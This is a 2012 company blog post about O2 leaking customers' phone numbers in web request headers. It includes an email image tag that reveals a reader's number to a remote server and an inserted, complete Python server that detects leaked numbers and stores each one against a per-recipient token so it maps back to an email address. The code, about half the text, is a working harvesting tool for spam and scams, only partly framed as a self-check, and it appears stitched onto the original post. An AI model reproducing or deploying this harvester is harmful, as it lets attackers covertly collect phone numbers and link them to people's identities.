O2 - "We're better...connected"

24 January 2012

News broke on Twitter this morning that telecoms giant O2 have been inadvertently sending out customers' phone numbers to every website they visit. O2 have yet to come back with an official explanation, but it would seem to be an error.

Industry expert and Glow Technical Director Thom Shannon realised that one consequence of this is that anyone can collect mobile phone numbers from O2 iPhone customers simply by sending them an email.

“Potentially, this would allow spammers, unscrupulous websites and basically anyone else to very easily harvest lists of phone numbers,” commented Thom Shannon. “From O2’s customers’ point of view that’s very worrying. Phone numbers are normally hard to get hold of, are used to personally identify individuals and are frequently abused by spammers.”

The issue was first demonstrated by Lewis Peckover with this simple demonstration page. Our Technical Director Thom Shannon has since shown how it could be used to get phone numbers from individuals' email addresses: a malicious attacker can send a carefully crafted email to any number of people, and anyone viewing it on their phone would inadvertently reveal their mobile phone number to the attacker.

To see a demonstration of this, the following image tag can be embedded in an email; if that email is read on a mobile over O2 3G, the image should show that phone's number. We're not logging anything on our server, but we can't say the same about anyone else!

<img src="http://assets.glow-internet.com/mob.aspx" />
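What sits behind a URL like the one above is a small web server: the phone's request arrives carrying an extra header that the operator's network added, and the server reflects that value back as the image. The following is an added example of that server side, written for this page and not Glow's mob.aspx. It assumes (1) that the leaked number travels in a request header whose name this page does not give, so instead of hard-coding a name it flags any header whose value is shaped like a phone number; (2) that a harvester would put a per-recipient token in the image URL (the demonstration URL above has none) so each leaked number maps straight back to the email address it was sent to, which is the "augment a stolen database" scenario described below. The header name X-Leak, the token parameter id and the 4477009... numbers in the comments are constructed stand-ins, not values seen on O2.

```python
"""Server side of the 'image that shows your number' demonstration.

Added example, not Glow's mob.aspx. Assumptions, marked inline:
  * the operator proxy adds the subscriber number as an extra HTTP
    request header (name unknown here, so we look for phone-shaped values);
  * a harvester ties each request to a recipient via ?id=<token> in the
    image URL (the page's own demonstration URL carries no token).
"""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse
from xml.sax.saxutils import escape

# E.164-ish: optional '+', then 7 to 15 digits. Tight enough not to match
# a port number or a one-digit flag, loose enough for any national format.
PHONE_RE = re.compile(r"^\+?\d{7,15}$")

# Headers a browser legitimately sends with a purely numeric value.
BENIGN = {"content-length", "max-forwards"}


def find_number_headers(headers):
    """Return {lower-cased header: value} for headers carrying a phone-shaped value.

    `headers` is any mapping of header name to value. A browser never sends
    its owner's phone number on its own, so anything returned here was put
    into the request by something on the network path (here: the operator).
    """
    found = {}
    for name, value in headers.items():
        key = name.lower()
        if key in BENIGN:
            continue
        candidate = value.strip().replace(" ", "")
        if PHONE_RE.match(candidate):
            found[key] = candidate
    return found


# Constructed harvest store: recipient token -> set of leaked numbers.
# An attacker would have generated one token per email address when
# sending, so each entry maps straight back to an address.
HARVEST = {}


def record(path, headers):
    """Correlate one image request with the recipient token in its URL.

    Returns (token, numbers); token is None when the URL carried no ?id=
    parameter, as with the demonstration URL on this page.
    """
    query = parse_qs(urlparse(path).query)
    token = query.get("id", [None])[0]
    numbers = find_number_headers(headers)
    if token is not None and numbers:
        HARVEST.setdefault(token, set()).update(numbers.values())
    return token, numbers


def render_svg(numbers):
    """Build the image the victim sees: their own number, or a notice that nothing leaked.

    SVG keeps the example dependency-free; a mail client that blocks SVG
    images would need a raster image rendered the same way.
    """
    text = ", ".join(numbers.values()) if numbers else "no number in request headers"
    return (
        '<svg xmlns="http://www.w3.org/2000/svg" width="320" height="40">'
        '<rect width="100%" height="100%" fill="white"/>'
        f'<text x="8" y="26" font-family="sans-serif" font-size="18">{escape(text)}</text>'
        "</svg>"
    )


class Handler(BaseHTTPRequestHandler):
    """Serve the image for any path, e.g. /mob.svg?id=<token>."""

    def do_GET(self):
        token, numbers = record(self.path, dict(self.headers.items()))
        body = render_svg(numbers).encode()
        self.send_response(200)
        self.send_header("Content-Type", "image/svg+xml")
        self.send_header("Content-Length", str(len(body)))
        self.send_header("Cache-Control", "no-store")  # every open must reach the server
        self.end_headers()
        self.wfile.write(body)
        self.log_message("token=%s leaked=%s", token, numbers)


if __name__ == "__main__":
    HTTPServer(("", 8080), Handler).serve_forever()
```

The same script doubles as a check for your own operator: run it on a reachable host, open http://host:8080/mob.svg on a phone over mobile data (not Wi-Fi, since the proxy sits in the mobile data path), and read the image. Every header the detector flags was inserted by the network, not by the handset, which is exactly what O2 customers had no way of seeing until someone put it in an image.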

Thom Shannon added: "This approach could be used to augment a stolen database with mobile numbers, allowing a malicious individual to scam people more effectively. It could even be used by an investigator with a celebrity's email address to get their phone number and hack into their voicemail!"

You can read the full story as covered by internet industry website TheNextWeb.